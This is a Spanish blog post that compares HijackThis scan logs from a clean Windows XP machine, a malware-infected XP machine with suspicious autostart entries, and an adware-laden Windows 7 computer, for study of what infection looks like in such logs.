Posts etiquetados ‘seguridad’

logo Hijackthis

A continuación se copia un log tomado con HijackThis en un Sistema Operativo Windows XP Profesional para su posterior estudio.

Nota: El Sistema Operativo es totalmente nuevo y  no tiene problemas de infección por Malware.

Logfile of Trend Micro HijackThis v2.0.4
Scan saved at 11:44:28, on 03/02/2012
Platform: Windows XP SP3 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP3 (6.00.2900.5512)
Boot mode: Normal
Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\Archivos de programa\VMware\VMware Tools\vmacthlp.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\spoolsv.exe
C:\WINDOWS\Explorer.EXE
C:\Archivos de programa\VMware\VMware Tools\VMwareTray.exe
C:\Archivos de programa\VMware\VMware Tools\VMwareUser.exe
C:\WINDOWS\system32\ctfmon.exe
C:\Archivos de programa\VMware\VMware Tools\vmtoolsd.exe
C:\Archivos de programa\VMware\VMware Tools\VMUpgradeHelper.exe
C:\Archivos de programa\VMware\VMware Tools\TPAutoConnSvc.exe
C:\WINDOWS\system32\wscntfy.exe
C:\Archivos de programa\VMware\VMware Tools\TPAutoConnect.exe
C:\Archivos de programa\Internet Explorer\iexplore.exe
C:\WINDOWS\system32\msiexec.exe
C:\Archivos de programa\Trend Micro\HiJackThis\HiJackThis.exe
R0 - HKCU\Software\Microsoft\Internet Explorer\Toolbar,LinksFolderName = Vínculos
O4 - HKLM\..\Run: [VMware Tools] "C:\Archivos de programa\VMware\VMware Tools\VMwareTray.exe"
O4 - HKLM\..\Run: [VMware User Process] "C:\Archivos de programa\VMware\VMware Tools\VMwareUser.exe"
O4 - HKCU\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\ctfmon.exe
O4 - HKUS\S-1-5-19\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\CTFMON.EXE (User 'SERVICIO LOCAL')
O4 - HKUS\S-1-5-20\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\CTFMON.EXE (User 'Servicio de red')
O4 - HKUS\S-1-5-18\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\CTFMON.EXE (User 'SYSTEM')
O4 - HKUS\.DEFAULT\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\CTFMON.EXE (User 'Default user')
O9 - Extra button: (no name) - {e2e2dd38-d088-4134-82b7-f2ba38496583} - C:\WINDOWS\Network Diagnostic\xpnetdiag.exe
O9 - Extra 'Tools' menuitem: @xpsp3res.dll,-20001 - {e2e2dd38-d088-4134-82b7-f2ba38496583} - C:\WINDOWS\Network Diagnostic\xpnetdiag.exe
O9 - Extra button: Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Archivos de programa\Messenger\msmsgs.exe
O9 - Extra 'Tools' menuitem: Windows Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Archivos de programa\Messenger\msmsgs.exe
O10 - Unknown file in Winsock LSP: c:\archivos de programa\vmware\vmware tools\vsock sdk\bin\win32\vsocklib.dll
O10 - Unknown file in Winsock LSP: c:\archivos de programa\vmware\vmware tools\vsock sdk\bin\win32\vsocklib.dll
O20 - Winlogon Notify: TPSvc - TPSvc.dll (file missing)
O20 - Winlogon Notify: VMUpgradeAtShutdown - VMUpgradeAtShutdownWXP.dll (file missing)
O22 - SharedTaskScheduler: Precargador Browseui - {438755C2-A8BA-11D1-B96B-00A0C90312E1} - C:\WINDOWS\system32\browseui.dll
O22 - SharedTaskScheduler: Demonio de caché de las categorías de componente - {8C7461EF-2B13-11d2-BE35-3078302C2030} - C:\WINDOWS\system32\browseui.dll
O23 - Service: Servicio del administrador de discos lógicos (dmadmin) - Unknown owner - C:\WINDOWS\System32\dmadmin.exe
O23 - Service: Registro de sucesos (Eventlog) - Unknown owner - C:\WINDOWS\system32\services.exe
O23 - Service: Servicio COM de grabación de CD de IMAPI (ImapiService) - Unknown owner - C:\WINDOWS\system32\imapi.exe
O23 - Service: Escritorio remoto compartido de NetMeeting (mnmsrvc) - Unknown owner - C:\WINDOWS\system32\mnmsrvc.exe
O23 - Service: Plug and Play (PlugPlay) - Unknown owner - C:\WINDOWS\system32\services.exe
O23 - Service: Administrador de sesión de Ayuda de escritorio remoto (RDSessMgr) - Unknown owner - C:\WINDOWS\system32\sessmgr.exe
O23 - Service: Tarjeta inteligente (SCardSvr) - Unknown owner - C:\WINDOWS\System32\SCardSvr.exe
O23 - Service: Registros y alertas de rendimiento (SysmonLog) - Unknown owner - C:\WINDOWS\system32\smlogsvc.exe
O23 - Service: TP AutoConnect Service (TPAutoConnSvc) - ThinPrint AG - C:\Archivos de programa\VMware\VMware Tools\TPAutoConnSvc.exe
O23 - Service: TP VC Gateway Service (TPVCGateway) - ThinPrint AG - C:\Archivos de programa\VMware\VMware Tools\TPVCGateway.exe
O23 - Service: VMware Tools Service (VMTools) - VMware, Inc. - C:\Archivos de programa\VMware\VMware Tools\vmtoolsd.exe
O23 - Service: Auxiliar de actualización de VMware (VMUpgradeHelper) - VMware, Inc. - C:\Archivos de programa\VMware\VMware Tools\VMUpgradeHelper.exe
O23 - Service: Servicio auxiliar de disco físico de VMware (VMware Physical Disk Helper Service) - VMware, Inc. - C:\Archivos de programa\VMware\VMware Tools\vmacthlp.exe
O23 - Service: Instantáneas de volumen (VSS) - Unknown owner - C:\WINDOWS\System32\vssvc.exe
O23 - Service: Adaptador de rendimiento de WMI (WmiApSrv) - Unknown owner - C:\WINDOWS\system32\wbem\wmiapsrv.exe
--
End of file - 4834 bytes

A continuación se copia un log de Windows XP Profesional infectado por Malware.

Logfile of Trend Micro HijackThis v2.0.4 Scan saved at 23:23:13, on 04/02/2012 Platform: Windows XP SP3 (WinNT 5.01.2600) MSIE: Internet Explorer v6.00 SP3 (6.00.2900.5512) Boot mode: Normal Running processes: C:\WINDOWS\System32\smss.exe C:\WINDOWS\system32\winlogon.exe C:\WINDOWS\system32\services.exe C:\WINDOWS\system32\lsass.exe C:\Archivos de programa\VMware\VMware Tools\vmacthlp.exe C:\WINDOWS\system32\svchost.exe C:\WINDOWS\System32\svchost.exe C:\WINDOWS\system32\spoolsv.exe C:\Archivos de programa\VMware\VMware Tools\vmtoolsd.exe C:\Archivos de programa\VMware\VMware Tools\VMUpgradeHelper.exe C:\Archivos de programa\VMware\VMware Tools\TPAutoConnSvc.exe C:\WINDOWS\system32\wscntfy.exe C:\WINDOWS\Explorer.EXE C:\Archivos de programa\VMware\VMware Tools\VMwareTray.exe C:\Archivos de programa\VMware\VMware Tools\VMwareUser.exe C:\WINDOWS\system32\kernel32.dlI C:\WINDOWS\system32\wind.exe C:\WINDOWS\system32\ctfmon.exe C:\Archivos de programa\VMware\VMware Tools\TPAutoConnect.exe C:\downfull.exe C:\WINDOWS\system32\wuauclt.exe C:\Archivos de programa\Mozilla Firefox\firefox.exe C:\Archivos de programa\Trend Micro\HiJackThis\HiJackThis.exe R0 – HKCU\Software\Microsoft\Internet Explorer\Toolbar,LinksFolderName = Vínculos O4 – HKLM\..\Run: [VMware Tools] “C:\Archivos de programa\VMware\VMware Tools\VMwareTray.exe” O4 – HKLM\..\Run: [VMware User Process] “C:\Archivos de programa\VMware\VMware Tools\VMwareUser.exe” O4 – HKLM\..\Run: [kernel32] C:\WINDOWS\system32\kernel32.dlI O4 – HKLM\..\Run: [system] c:\WINDOWS\system32\wind.exe O4 – HKCU\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\ctfmon.exe O4 – HKCU\..\Run: [WindowsUpdate] C:\\downfull.exe O4 – HKUS\S-1-5-19\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\CTFMON.EXE (User ‘SERVICIO LOCAL’) O4 – HKUS\S-1-5-20\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\CTFMON.EXE (User ‘Servicio de red’) O4 – HKUS\S-1-5-18\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\CTFMON.EXE (User ‘SYSTEM’) O4 – HKUS\.DEFAULT\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\CTFMON.EXE (User ‘Default user’) O9 – Extra button: (no name) – {e2e2dd38-d088-4134-82b7-f2ba38496583} – C:\WINDOWS\Network Diagnostic\xpnetdiag.exe O9 – Extra ‘Tools’ menuitem: @xpsp3res.dll,-20001 – {e2e2dd38-d088-4134-82b7-f2ba38496583} – C:\WINDOWS\Network Diagnostic\xpnetdiag.exe O9 – Extra button: Messenger – {FB5F1910-F110-11d2-BB9E-00C04F795683} – C:\Archivos de programa\Messenger\msmsgs.exe O9 – Extra ‘Tools’ menuitem: Windows Messenger – {FB5F1910-F110-11d2-BB9E-00C04F795683} – C:\Archivos de programa\Messenger\msmsgs.exe O10 – Unknown file in Winsock LSP: c:\archivos de programa\vmware\vmware tools\vsock sdk\bin\win32\vsocklib.dll O10 – Unknown file in Winsock LSP: c:\archivos de programa\vmware\vmware tools\vsock sdk\bin\win32\vsocklib.dll O20 – Winlogon Notify: TPSvc – TPSvc.dll (file missing) O20 – Winlogon Notify: VMUpgradeAtShutdown – VMUpgradeAtShutdownWXP.dll (file missing) O22 – SharedTaskScheduler: Precargador Browseui – {438755C2-A8BA-11D1-B96B-00A0C90312E1} – C:\WINDOWS\system32\browseui.dll O22 – SharedTaskScheduler: Demonio de caché de las categorías de componente – {8C7461EF-2B13-11d2-BE35-3078302C2030} – C:\WINDOWS\system32\browseui.dll O23 – Service: Servicio del administrador de discos lógicos (dmadmin) – Unknown owner – C:\WINDOWS\System32\dmadmin.exe O23 – Service: Registro de sucesos (Eventlog) – Unknown owner – C:\WINDOWS\system32\services.exe O23 – Service: Servicio COM de grabación de CD de IMAPI (ImapiService) – Unknown owner – C:\WINDOWS\system32\imapi.exe O23 – Service: Escritorio remoto compartido de NetMeeting (mnmsrvc) – Unknown owner – C:\WINDOWS\system32\mnmsrvc.exe O23 – Service: Plug and Play (PlugPlay) – Unknown owner – C:\WINDOWS\system32\services.exe O23 – Service: Administrador de sesión de Ayuda de escritorio remoto (RDSessMgr) – Unknown owner – C:\WINDOWS\system32\sessmgr.exe O23 – Service: Tarjeta inteligente (SCardSvr) – Unknown owner – C:\WINDOWS\System32\SCardSvr.exe O23 – Service: Registros y alertas de rendimiento (SysmonLog) – Unknown owner – C:\WINDOWS\system32\smlogsvc.exe O23 – Service: TP AutoConnect Service (TPAutoConnSvc) – ThinPrint AG – C:\Archivos de programa\VMware\VMware Tools\TPAutoConnSvc.exe O23 – Service: TP VC Gateway Service (TPVCGateway) – ThinPrint AG – C:\Archivos de programa\VMware\VMware Tools\TPVCGateway.exe O23 – Service: VMware Tools Service (VMTools) – VMware, Inc. – C:\Archivos de programa\VMware\VMware Tools\vmtoolsd.exe O23 – Service: Auxiliar de actualización de VMware (VMUpgradeHelper) – VMware, Inc. – C:\Archivos de programa\VMware\VMware Tools\VMUpgradeHelper.exe O23 – Service: Servicio auxiliar de disco físico de VMware (VMware Physical Disk Helper Service) – VMware, Inc. – C:\Archivos de programa\VMware\VMware Tools\vmacthlp.exe O23 – Service: Instantáneas de volumen (VSS) – Unknown owner – C:\WINDOWS\System32\vssvc.exe O23 – Service: Adaptador de rendimiento de WMI (WmiApSrv) – Unknown owner – C:\WINDOWS\system32\wbem\wmiapsrv.exe — End of file – 5084 bytes

Pasa el tiempo y me llama la atención el siguiente log de la computadora de un amigo, por ello lo publico.
Este log fue tomado después de pasar un escaner de Malware con Avast 6, y lógicamente después de haber eliminado mucho código malicioso del ordenador.

Logfile of Trend Micro HijackThis v2.0.4
 Scan saved at 18:47:47, on 23/02/2012
 Platform: Windows 7  (WinNT 6.00.3504)
 MSIE: Internet Explorer v9.00 (9.00.8112.16421)
 Boot mode: Safe mode
Running processes:
 C:\Windows\SYSTEM32\WISPTIS.EXE
 C:\Program Files\Common Files\microsoft shared\ink\TabTip.exe
 C:\Windows\Explorer.EXE
 C:\Windows\system32\ctfmon.exe
 C:\Windows\helppane.exe
 C:\Users\carlos\Downloads\HijackThis.exe
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896
 R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank
 R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://go.microsoft.com/fwlink/?LinkId=69157
 R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://go.microsoft.com/fwlink/?LinkId=54896
 R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896
 R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://go.microsoft.com/fwlink/?LinkId=69157
 R0 - HKLM\Software\Microsoft\Internet Explorer\Search,SearchAssistant = http://search.babylon.com/?babsrc=SP_ss&q={searchTerms}&mntrId=189246db0000000000000021866f6fd7&tlver=1.4.19.19&ss=1&affID=18028
 R0 - HKLM\Software\Microsoft\Internet Explorer\Search,CustomizeSearch =
 R0 - HKCU\Software\Microsoft\Internet Explorer\Toolbar,LinksFolderName =
 R3 - URLSearchHook: pdfforge Toolbar - {B922D405-6D13-4A2B-AE89-08A030DA4402} - C:\Program Files\pdfforge Toolbar\IE\5.0\pdfforgeToolbarIE.dll
 O2 - BHO: HP Print Enhancer - {0347C33E-8762-4905-BF09-768834316C61} - C:\Program Files\HP\Digital Imaging\Smart Web Printing\hpswp_printenhancer.dll
 O2 - BHO: AcroIEHelperStub - {18DF081C-E8AD-4283-A596-FA578C2EBDC3} - C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll
 O2 - BHO: Babylon toolbar helper - {2EECD738-5844-4a99-B4B6-146BF802613B} - C:\Program Files\BabylonToolbar\BabylonToolbar\1.5.3.17\bh\BabylonToolbar.dll
 O2 - BHO: Spybot-S&D IE Protection - {53707962-6F74-2D53-2644-206D7942484F} - C:\Program Files\Spybot - Search & Destroy\SDHelper.dll
 O2 - BHO: Groove GFS Browser Helper - {72853161-30C5-4D22-B7F9-0BBC1D38A37E} - C:\Program Files\Microsoft Office\Office12\GrooveShellExtensions.dll
 O2 - BHO: avast! WebRep - {8E5E2654-AD2D-48bf-AC2D-D17F00898D06} - C:\Program Files\AVAST Software\Avast\aswWebRepIE.dll
 O2 - BHO: Windows Live ID Sign-in Helper - {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll
 O2 - BHO: Windows Live Messenger Companion Helper - {9FDDE16B-836F-4806-AB1F-1455CBEFF289} - C:\Program Files\Windows Live\Companion\companioncore.dll
 O2 - BHO: pdfforge Toolbar - {B922D405-6D13-4A2B-AE89-08A030DA4402} - C:\Program Files\pdfforge Toolbar\IE\5.0\pdfforgeToolbarIE.dll
 O2 - BHO: HP Smart BHO Class - {FFFFFFFF-CF4E-4F2B-BDC2-0E72E116A856} - C:\Program Files\HP\Digital Imaging\Smart Web Printing\hpswp_BHO.dll
 O3 - Toolbar: avast! WebRep - {8E5E2654-AD2D-48bf-AC2D-D17F00898D06} - C:\Program Files\AVAST Software\Avast\aswWebRepIE.dll
 O3 - Toolbar: Babylon Toolbar - {98889811-442D-49dd-99D7-DC866BE87DBC} - C:\Program Files\BabylonToolbar\BabylonToolbar\1.5.3.17\BabylonToolbarTlbr.dll
 O3 - Toolbar: pdfforge Toolbar - {B922D405-6D13-4A2B-AE89-08A030DA4402} - C:\Program Files\pdfforge Toolbar\IE\5.0\pdfforgeToolbarIE.dll
 O4 - HKLM\..\Run: [avast] "C:\Program Files\AVAST Software\Avast\avastUI.exe" /nogui
 O4 - HKLM\..\Run: [SearchSettings] "C:\Program Files\Common Files\Spigot\Search Settings\SearchSettings.exe"
 O4 - HKCU\..\Run: [Skype] "C:\Program Files\Skype\Phone\Skype.exe" /nosplash /minimized
 O4 - HKCU\..\Run: [SpybotSD TeaTimer] C:\Program Files\Spybot - Search & Destroy\TeaTimer.exe
 O4 - HKCU\..\Run: [msnmsgr] "C:\Program Files\Windows Live\Messenger\msnmsgr.exe" /background
 O4 - HKUS\S-1-5-19\..\Run: [Sidebar] %ProgramFiles%\Windows Sidebar\Sidebar.exe /autoRun (User 'SERVICIO LOCAL')
 O4 - HKUS\S-1-5-19\..\RunOnce: [mctadmin] C:\Windows\System32\mctadmin.exe (User 'SERVICIO LOCAL')
 O4 - HKUS\S-1-5-20\..\Run: [Sidebar] %ProgramFiles%\Windows Sidebar\Sidebar.exe /autoRun (User 'Servicio de red')
 O4 - HKUS\S-1-5-20\..\RunOnce: [mctadmin] C:\Windows\System32\mctadmin.exe (User 'Servicio de red')
 O8 - Extra context menu item: Add to Google Photos Screensa&ver - res://C:\Windows\system32\GPhotos.scr/200
 O8 - Extra context menu item: Append Link Target to Existing PDF - res://C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEFavClient.dll/AcroIEAppendSelLinks.html
 O8 - Extra context menu item: E&xportar a Microsoft Excel - res://C:\PROGRA~1\MICROS~1\Office12\EXCEL.EXE/3000
 O9 - Extra button: @C:\Program Files\Windows Live\Companion\companionlang.dll,-600 - {0000036B-C524-4050-81A0-243669A86B9F} - C:\Program Files\Windows Live\Companion\companioncore.dll
 O9 - Extra button: Enviar a OneNote - {2670000A-7350-4f3c-8081-5663EE0C6C49} - C:\PROGRA~1\MICROS~1\Office12\ONBttnIE.dll
 O9 - Extra 'Tools' menuitem: &Enviar a OneNote - {2670000A-7350-4f3c-8081-5663EE0C6C49} - C:\PROGRA~1\MICROS~1\Office12\ONBttnIE.dll
 O9 - Extra button: Research - {92780B25-18CC-41C8-B9BE-3C9C571A8263} - C:\PROGRA~1\MICROS~1\Office12\REFIEBAR.DLL
 O9 - Extra button: Mostrar u ocultar HP Smart Web Printing - {DDE87865-83C5-48c4-8357-2F5B1AA84522} - C:\Program Files\HP\Digital Imaging\Smart Web Printing\hpswp_BHO.dll
 O9 - Extra button: (no name) - {DFB852A3-47F8-48C4-A200-58CAB36FD2A2} - C:\Program Files\Spybot - Search & Destroy\SDHelper.dll
 O9 - Extra 'Tools' menuitem: Spybot - Search && Destroy Configuration - {DFB852A3-47F8-48C4-A200-58CAB36FD2A2} - C:\Program Files\Spybot - Search & Destroy\SDHelper.dll
 O10 - Unknown file in Winsock LSP: c:\program files\common files\microsoft shared\windows live\wlidnsp.dll
 O10 - Unknown file in Winsock LSP: c:\program files\common files\microsoft shared\windows live\wlidnsp.dll
 O11 - Options group: [ACCELERATED_GRAPHICS] Accelerated graphics
 O16 - DPF: {D27CDB6E-AE6D-11CF-96B8-444553540000} (Shockwave Flash Object) - http://fpdownload2.macromedia.com/get/shockwave/cabs/flash/swflash.cab
 O17 - HKLM\System\CCS\Services\Tcpip\..\{60C208C2-FDB6-44F6-AC2F-200333B43242}: NameServer = 192.168.2.4,172.17.3.157
 O18 - Protocol: grooveLocalGWS - {88FED34C-F0CA-4636-A375-3CB6248B04CD} - C:\Program Files\Microsoft Office\Office12\GrooveSystemServices.dll
 O18 - Protocol: wlpg - {E43EF6CD-A37A-4A9B-9E6F-83F89B8E6324} - C:\Program Files\Windows Live\Photo Gallery\AlbumDownloadProtocolHandler.dll
 O23 - Service: Adobe Acrobat Update Service (AdobeARMservice) - Adobe Systems Incorporated - C:\Program Files\Common Files\Adobe\ARM\1.0\armsvc.exe
 O23 - Service: @%SystemRoot%\system32\aelupsvc.dll,-1 (AeLookupSvc) - Unknown owner - C:\Windows\system32\svchost.exe
 O23 - Service: @%SystemRoot%\system32\Alg.exe,-112 (ALG) - Unknown owner - C:\Windows\System32\alg.exe
 O23 - Service: AMD External Events Utility - AMD - C:\Windows\system32\atiesrxx.exe
 O23 - Service: @%systemroot%\system32\appidsvc.dll,-100 (AppIDSvc) - Unknown owner - C:\Windows\system32\svchost.exe
 O23 - Service: @%systemroot%\system32\appinfo.dll,-100 (Appinfo) - Unknown owner - C:\Windows\system32\svchost.exe
 O23 - Service: Application Updater - Spigot, Inc. - C:\Program Files\Application Updater\ApplicationUpdater.exe
 O23 - Service: @appmgmts.dll,-3250 (AppMgmt) - Unknown owner - C:\Windows\system32\svchost.exe
 O23 - Service: @%SystemRoot%\system32\audiosrv.dll,-204 (AudioEndpointBuilder) - Unknown owner - C:\Windows\System32\svchost.exe
 O23 - Service: @%SystemRoot%\system32\audiosrv.dll,-200 (Audiosrv) - Unknown owner - C:\Windows\System32\svchost.exe
 O23 - Service: avast! Antivirus - AVAST Software - C:\Program Files\AVAST Software\Avast\AvastSvc.exe
 O23 - Service: @%SystemRoot%\system32\AxInstSV.dll,-103 (AxInstSV) - Unknown owner - C:\Windows\system32\svchost.exe
 O23 - Service: @%SystemRoot%\system32\bdesvc.dll,-100 (BDESVC) - Unknown owner - C:\Windows\System32\svchost.exe
 O23 - Service: @%SystemRoot%\system32\bfe.dll,-1001 (BFE) - Unknown owner - C:\Windows\system32\svchost.exe
 O23 - Service: @%SystemRoot%\system32\qmgr.dll,-1000 (BITS) - Unknown owner - C:\Windows\System32\svchost.exe
 O23 - Service: @%systemroot%\system32\browser.dll,-100 (Browser) - Unknown owner - C:\Windows\System32\svchost.exe
 O23 - Service: @%SystemRoot%\System32\bthserv.dll,-101 (bthserv) - Unknown owner - C:\Windows\system32\svchost.exe
 O23 - Service: @%SystemRoot%\System32\certprop.dll,-11 (CertPropSvc) - Unknown owner - C:\Windows\system32\svchost.exe
 O23 - Service: @%SystemRoot%\system32\cryptsvc.dll,-1001 (CryptSvc) - Unknown owner - C:\Windows\system32\svchost.exe
 O23 - Service: @%systemroot%\system32\cscsvc.dll,-200 (CscService) - Unknown owner - C:\Windows\System32\svchost.exe
 O23 - Service: @oleres.dll,-5012 (DcomLaunch) - Unknown owner - C:\Windows\system32\svchost.exe
 O23 - Service: @%SystemRoot%\system32\defragsvc.dll,-101 (defragsvc) - Unknown owner - C:\Windows\system32\svchost.exe
 O23 - Service: @%SystemRoot%\system32\dhcpcore.dll,-100 (Dhcp) - Unknown owner - C:\Windows\system32\svchost.exe
 O23 - Service: @%SystemRoot%\System32\dnsapi.dll,-101 (Dnscache) - Unknown owner - C:\Windows\system32\svchost.exe
 O23 - Service: @%systemroot%\system32\dot3svc.dll,-1102 (dot3svc) - Unknown owner - C:\Windows\system32\svchost.exe
 O23 - Service: @%systemroot%\system32\dps.dll,-500 (DPS) - Unknown owner - C:\Windows\System32\svchost.exe
 O23 - Service: @%systemroot%\system32\eapsvc.dll,-1 (EapHost) - Unknown owner - C:\Windows\System32\svchost.exe
 O23 - Service: @%SystemRoot%\ehome\ehrecvr.exe,-101 (ehRecvr) - Unknown owner - C:\Windows\ehome\ehRecvr.exe
 O23 - Service: @%SystemRoot%\ehome\ehsched.exe,-101 (ehSched) - Unknown owner - C:\Windows\ehome\ehsched.exe
 O23 - Service: @%SystemRoot%\system32\wevtsvc.dll,-200 (eventlog) - Unknown owner - C:\Windows\System32\svchost.exe
 O23 - Service: @comres.dll,-2450 (EventSystem) - Unknown owner - C:\Windows\system32\svchost.exe
 O23 - Service: @%systemroot%\system32\fdPHost.dll,-100 (fdPHost) - Unknown owner - C:\Windows\system32\svchost.exe
 O23 - Service: @%systemroot%\system32\fdrespub.dll,-100 (FDResPub) - Unknown owner - C:\Windows\system32\svchost.exe
 O23 - Service: @%systemroot%\system32\FntCache.dll,-100 (FontCache) - Unknown owner - C:\Windows\system32\svchost.exe
 O23 - Service: @gpapi.dll,-112 (gpsvc) - Unknown owner - C:\Windows\system32\svchost.exe
 O23 - Service: Servicio Google Update (gupdate) (gupdate) - Unknown owner - C:\Program Files\Google\Update\GoogleUpdate.exe
 O23 - Service: Servicio de Google Update (gupdatem) (gupdatem) - Unknown owner - C:\Program Files\Google\Update\GoogleUpdate.exe
 O23 - Service: Google Updater Service (gusvc) - Google - C:\Program Files\Google\Common\Google Updater\GoogleUpdaterService.exe
 O23 - Service: @%SystemRoot%\System32\hidserv.dll,-101 (hidserv) - Unknown owner - C:\Windows\system32\svchost.exe
 O23 - Service: @%SystemRoot%\system32\kmsvc.dll,-6 (hkmsvc) - Unknown owner - C:\Windows\System32\svchost.exe
 O23 - Service: @%SystemRoot%\System32\ListSvc.dll,-100 (HomeGroupListener) - Unknown owner - C:\Windows\System32\svchost.exe
 O23 - Service: @%SystemRoot%\System32\provsvc.dll,-100 (HomeGroupProvider) - Unknown owner - C:\Windows\System32\svchost.exe
 O23 - Service: hpqcxs08 - Unknown owner - C:\Windows\system32\svchost.exe
 O23 - Service: Servicio HP CUE DeviceDiscovery (hpqddsvc) - Unknown owner - C:\Windows\system32\svchost.exe
 O23 - Service: InstallDriver Table Manager (IDriverT) - Macrovision Corporation - C:\Program Files\Common Files\InstallShield\Driver\1050\Intel 32\IDriverT.exe
 O23 - Service: @%SystemRoot%\system32\ikeext.dll,-501 (IKEEXT) - Unknown owner - C:\Windows\system32\svchost.exe
 O23 - Service: @%systemroot%\system32\IPBusEnum.dll,-102 (IPBusEnum) - Unknown owner - C:\Windows\system32\svchost.exe
 O23 - Service: @%SystemRoot%\system32\iphlpsvc.dll,-500 (iphlpsvc) - Unknown owner - C:\Windows\System32\svchost.exe
 O23 - Service: @comres.dll,-2946 (KtmRm) - Unknown owner - C:\Windows\System32\svchost.exe
 O23 - Service: @%systemroot%\system32\srvsvc.dll,-100 (LanmanServer) - Unknown owner - C:\Windows\system32\svchost.exe
 O23 - Service: @%systemroot%\system32\wkssvc.dll,-100 (LanmanWorkstation) - Unknown owner - C:\Windows\System32\svchost.exe
 O23 - Service: @%SystemRoot%\system32\lltdres.dll,-1 (lltdsvc) - Unknown owner - C:\Windows\System32\svchost.exe
 O23 - Service: @%SystemRoot%\system32\lmhsvc.dll,-101 (lmhosts) - Unknown owner - C:\Windows\system32\svchost.exe
 O23 - Service: @%systemroot%\system32\mmcss.dll,-100 (MMCSS) - Unknown owner - C:\Windows\system32\svchost.exe
 O23 - Service: @%SystemRoot%\system32\FirewallAPI.dll,-23090 (MpsSvc) - Unknown owner - C:\Windows\system32\svchost.exe
 O23 - Service: @comres.dll,-2797 (MSDTC) - Unknown owner - C:\Windows\System32\msdtc.exe
 O23 - Service: @%SystemRoot%\system32\iscsidsc.dll,-5000 (MSiSCSI) - Unknown owner - C:\Windows\system32\svchost.exe
 O23 - Service: @%SystemRoot%\system32\msimsg.dll,-27 (msiserver) - Unknown owner - C:\Windows\system32\msiexec.exe
 O23 - Service: @%SystemRoot%\system32\qagentrt.dll,-6 (napagent) - Unknown owner - C:\Windows\System32\svchost.exe
 O23 - Service: Net Driver HPZ12 - Unknown owner - C:\Windows\System32\svchost.exe
 O23 - Service: @%SystemRoot%\system32\netman.dll,-109 (Netman) - Unknown owner - C:\Windows\System32\svchost.exe
 O23 - Service: @%SystemRoot%\system32\netprofm.dll,-202 (netprofm) - Unknown owner - C:\Windows\System32\svchost.exe
 O23 - Service: @%SystemRoot%\System32\nlasvc.dll,-1 (NlaSvc) - Unknown owner - C:\Windows\System32\svchost.exe
 O23 - Service: @%SystemRoot%\system32\nsisvc.dll,-200 (nsi) - Unknown owner - C:\Windows\system32\svchost.exe
 O23 - Service: @%SystemRoot%\system32\pnrpsvc.dll,-8004 (p2pimsvc) - Unknown owner - C:\Windows\System32\svchost.exe
 O23 - Service: @%SystemRoot%\system32\p2psvc.dll,-8006 (p2psvc) - Unknown owner - C:\Windows\System32\svchost.exe
 O23 - Service: @%SystemRoot%\system32\pcasvc.dll,-1 (PcaSvc) - Unknown owner - C:\Windows\system32\svchost.exe
 O23 - Service: @%SystemRoot%\system32\peerdistsvc.dll,-9000 (PeerDistSvc) - Unknown owner - C:\Windows\System32\svchost.exe
 O23 - Service: @%systemroot%\system32\pla.dll,-500 (pla) - Unknown owner - C:\Windows\System32\svchost.exe
 O23 - Service: @%SystemRoot%\system32\umpnpmgr.dll,-100 (PlugPlay) - Unknown owner - C:\Windows\system32\svchost.exe
 O23 - Service: Pml Driver HPZ12 - Unknown owner - C:\Windows\System32\svchost.exe
 O23 - Service: @%SystemRoot%\system32\pnrpauto.dll,-8002 (PNRPAutoReg) - Unknown owner - C:\Windows\System32\svchost.exe
 O23 - Service: @%SystemRoot%\system32\pnrpsvc.dll,-8000 (PNRPsvc) - Unknown owner - C:\Windows\System32\svchost.exe
 O23 - Service: @%SystemRoot%\System32\polstore.dll,-5010 (PolicyAgent) - Unknown owner - C:\Windows\system32\svchost.exe
 O23 - Service: @%SystemRoot%\system32\umpo.dll,-100 (Power) - Unknown owner - C:\Windows\system32\svchost.exe
 O23 - Service: @%systemroot%\system32\profsvc.dll,-300 (ProfSvc) - Unknown owner - C:\Windows\system32\svchost.exe
 O23 - Service: @%SystemRoot%\system32\qwave.dll,-1 (QWAVE) - Unknown owner - C:\Windows\system32\svchost.exe
 O23 - Service: @%Systemroot%\system32\rasauto.dll,-200 (RasAuto) - Unknown owner - C:\Windows\System32\svchost.exe
 O23 - Service: @%Systemroot%\system32\rasmans.dll,-200 (RasMan) - Unknown owner - C:\Windows\System32\svchost.exe
 O23 - Service: @regsvc.dll,-1 (RemoteRegistry) - Unknown owner - C:\Windows\system32\svchost.exe
 O23 - Service: Roxio UPnP Renderer 9 - Sonic Solutions - C:\Program Files\Roxio\Digital Home 9\RoxioUPnPRenderer9.exe
 O23 - Service: Roxio Upnp Server 9 - Sonic Solutions - C:\Program Files\Roxio\Digital Home 9\RoxioUpnpService9.exe
 O23 - Service: LiveShare P2P Server 9 (RoxLiveShare9) - Sonic Solutions - C:\Program Files\Common Files\Roxio Shared\9.0\SharedCOM\RoxLiveShare9.exe
